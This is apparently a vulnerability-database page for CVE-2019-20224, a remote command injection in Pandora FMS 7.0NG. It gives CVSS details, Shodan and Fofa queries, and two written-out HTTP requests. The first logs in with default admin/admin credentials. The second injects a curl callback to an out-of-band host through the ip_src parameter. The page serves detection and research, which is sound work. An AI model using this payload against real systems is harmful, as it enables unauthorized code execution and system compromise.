🔙 목록으로 돌아가기

CVE-2019-20224: Pandora FMS 7.0NG - Remote Command Injection

TitlePandora FMS 7.0NG - Remote Command Injection
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
RemediationThis issue has been fixed in Pandora FMS 7.0 NG 742.
CVSS Score8.8
EPSS Score0.93568
CVE IDCVE-2019-20224
CWE IDCWE-78
Shodan Queryhttp.title:"pandora fms"
Fofa Querytitle="pandora fms"
Tags cve cve2019 pandorafms rce authenticated oast artica vuln

🔍 Vulnerability Description

Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.

🌐 HTTP Request

POST /pandora_console/index.php?login=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

nick=admin&pass=admin&login_button=Login
POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Connection: close
Content-Length: 259
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+d5jpfm9le0o0qt33tc30qip8izw86jadr.oast.fun+%23&draw_button=Draw

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-20224.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-20224.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A